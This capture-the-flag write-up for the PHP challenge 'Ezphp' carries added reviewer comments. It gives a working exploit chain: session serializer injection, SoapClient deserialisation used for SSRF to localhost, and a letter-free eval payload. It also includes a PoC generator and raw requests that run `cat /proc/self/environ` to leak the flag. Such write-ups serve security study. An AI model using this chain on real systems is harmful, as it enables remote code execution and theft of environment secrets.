Ezphp

index.php:

<?php
// Challenge file index.php exactly as shown on this page. The comments are
// reviewer notes on the risk each line carries; no code is changed.
highlight_file(__FILE__);
// Default callable for the final call_user_func() below. It is an ordinary
// global, so anything that writes globals from request data can replace it.
$b = 'implode';
// Arbitrary-function-call sink: the callee name is taken verbatim from the `f`
// query parameter and the whole POST array is passed as its single argument.
// The requests later on this page pass `session_start` and `extract` here.
call_user_func($_GET['f'], $_POST);
session_start();
// Unvalidated request data is written straight into the session.
if (isset($_GET['name'])) {
$_SESSION['name'] = $_GET['name'];
}
// Dumps the entire session into the response; this is the output channel the
// writeup later reads the flag from.
var_dump($_SESSION);
// With $b still 'implode' this only joins the first session value with
// 'welcome'. If $b has been overwritten (request two sends `b=call_user_func`
// through `f=extract`), this presumably turns into a method call on whatever
// object is the first session entry — confirm against the writeup's trace.
$a = array(reset($_SESSION), 'welcome');
call_user_func($b, $a);
?>

flag.php

<?php
session_start();
highlight_file(__FILE__);
echo 'only localhost can get shell!';
// Source-address check only. A request the server is coerced into sending to
// itself (the SoapClient SSRF on this page targets http://127.0.0.1/) arrives
// from 127.0.0.1 and passes this test; REMOTE_ADDR is not authentication.
if ($_SERVER["REMOTE_ADDR"] === "127.0.0.1"){
$shell=$_GET['i'];
// Character filter on the payload. The range is written `0-0`, which matches
// only the digit 0 — digits 1-9 are not rejected (presumably `0-9` was
// intended) — and the `i` modifier is redundant next to `a-zA-Z`. Non-ASCII
// bytes pass untouched, which is what the alphanumeric-free payload below
// relies on.
if(preg_match('/[a-zA-Z0-0]/i',$shell)){
die('hacker');
}
// Direct eval of a query parameter.
eval($shell);
}
?>
only localhost can get shell!

与 bestphp's revenge 大体相同:注入 session,反序列化 SoapClient 进行 SSRF 打到 flag.php

flag.php 对 shell 的内容有过滤,需要找一个能通过该过滤的 shell:

<?php
// Alphanumeric-free payload from the writeup, written to pass flag.php's
// `[a-zA-Z0-0]` filter. The original author's comment on the last line states
// it is equivalent to eval($_GET[_]). Detection note: bitwise NOT applied to
// non-ASCII literals, a boolean used as a string offset and a `$$` variable
// variable are the hallmarks of this payload family and are rare in
// legitimate code.
$__=[];
$_=($__==$__);
$__=~(融);
$___=$__[$_];
$__=~(匆);
$___.=$__[$_].$__[$_];
$__=~(随);
$___.=$__[$_];
$__=~(千);
$___.=$__[$_];
$__=~(苦);
$___.=$__[$_];
$____=~(~(_));
$__=~(帿);
$____.=$__[$_];
$__=~(庿);
$____.=$__[$_];
$__=~(站);
$____.=$__[$_];
$_=$$____;
$___($_[_]);
// equivalent to eval($_GET[_])

借助 index.php 对 session 的打印,将命令执行的结果保存在 session 中,多次尝试后在 /proc/self/environ 中找到 flag

PoC 生成脚本:

<?php
// PoC generator from the writeup: serialises a SoapClient whose uri and
// location both point at flag.php on the loopback address, carrying the
// payload above in `i` and, in `_`, PHP code that stores a command's output
// under $_SESSION["hahaha"].
$url = 'http://127.0.0.1/flag.php?_=$_SESSION["hahaha"]=`cat /proc/self/environ`&i=$__=[]; $_=($__==$__); $__=~(融); $___=$__[$_]; $__=~(匆); $___.=$__[$_].$__[$_]; $__=~(随); $___.=$__[$_]; $__=~(千); $___.=$__[$_]; $__=~(苦); $___.=$__[$_]; $____=~(~(_)); $__=~(帿); $____.=$__[$_]; $__=~(庿); $____.=$__[$_]; $__=~(站); $____.=$__[$_]; $_=$$____; $___($_[_]);';
$b = new SoapClient(null, array('uri' => $url, 'location' => $url));
$a = serialize($b);
// $url contains no '^^', so this replacement leaves $a unchanged here.
$a = str_replace('^^', "\r\n", $a);
// The leading '|' is the prefix seen in request one's `name=` value.
echo "|" . urlencode($a);
?>

请求一:

POST /index.php?f=session_start&name=|O%3A10%3A%22SoapClient%22%3A3%3A%7Bs%3A3%3A%22uri%22%3Bs%3A362%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%3F_%3D%24_SESSION%5B%22hahaha%22%5D%3D%60cat+%2Fproc%2Fself%2Fenviron%60%26i%3D%24__%3D%5B%5D%3B+%24_%3D%28%24__%3D%3D%24__%29%3B+%24__%3D%7E%28%E8%9E%8D%29%3B+%24___%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8C%86%29%3B+%24___.%3D%24__%5B%24_%5D.%24__%5B%24_%5D%3B+%24__%3D%7E%28%E9%9A%8F%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8D%83%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E8%8B%A6%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24____%3D%7E%28%7E%28_%29%29%3B+%24__%3D%7E%28%E5%B8%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%BA%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E7%AB%99%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24_%3D%24%24____%3B+%24___%28%24_%5B_%5D%29%3B%22%3Bs%3A8%3A%22location%22%3Bs%3A362%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%3F_%3D%24_SESSION%5B%22hahaha%22%5D%3D%60cat+%2Fproc%2Fself%2Fenviron%60%26i%3D%24__%3D%5B%5D%3B+%24_%3D%28%24__%3D%3D%24__%29%3B+%24__%3D%7E%28%E8%9E%8D%29%3B+%24___%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8C%86%29%3B+%24___.%3D%24__%5B%24_%5D.%24__%5B%24_%5D%3B+%24__%3D%7E%28%E9%9A%8F%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8D%83%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E8%8B%A6%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24____%3D%7E%28%7E%28_%29%29%3B+%24__%3D%7E%28%E5%B8%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%BA%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E7%AB%99%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24_%3D%24%24____%3B+%24___%28%24_%5B_%5D%29%3B%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D HTTP/1.1
Host: 8.130.177.112:15294
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cookie: PHPSESSID=aaa
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

serialize_handler=php_serialize

请求二:

POST /index.php?f=extract HTTP/1.1
Host: 8.130.177.112:15294
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=aaa
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

b=call_user_func

多次访问后,回显中出现的参数:

  ["PHPSESSID"]=>
  array(3) {
    [0]=>
    string(26) "7imbbmbj5nbrpl150k0t4j1bm5"
    [1]=>
    string(1) "/"
    [2]=>
    string(9) "127.0.0.1"
  }

请求三:

GET /index.php HTTP/1.1
Host: 8.130.177.112:15294
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7imbbmbj5nbrpl150k0t4j1bm5
Accept-Language: zh-CN,zh;q=0.9
Connection: close


回显:

array(1) {
["hahaha"]=>
string(918) "PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi USER=www-data HOSTNAME=b39c81750af6 PHP_INI_DIR=/usr/local/etc/php SHLVL=2 HOME=/home/www-data PHP_LDFLAGS=-Wl,-O1 -Wl,--hash-style=both -pie PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 PHP_MD5= PHP_VERSION=7.0.33 GPG_KEYS=1A4E8B7277C42E53DBA9C7B9BCAA30EA9C0D5763 6E4F6AB321FDC07F2C332E3AC2BF0BC433CFC8B3 PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 PHP_ASC_URL=https://secure.php.net/get/php-7.0.33.tar.xz.asc/from/this/mirror PHP_URL=https://secure.php.net/get/php-7.0.33.tar.xz/from/this/mirror PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PHPIZE_DEPS=autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2c PWD=/var/www/html PHP_SHA256=ab8c5be6e32b1f8d032909dedaaaa4bbb1a209e519abb01a52ce3914f9a13d96 FLAG=flag{ISEC-c59691c19713573fa23f0876257cfd7c} "
}

FLAG=flag{ISEC-c59691c19713573fa23f0876257cfd7c}

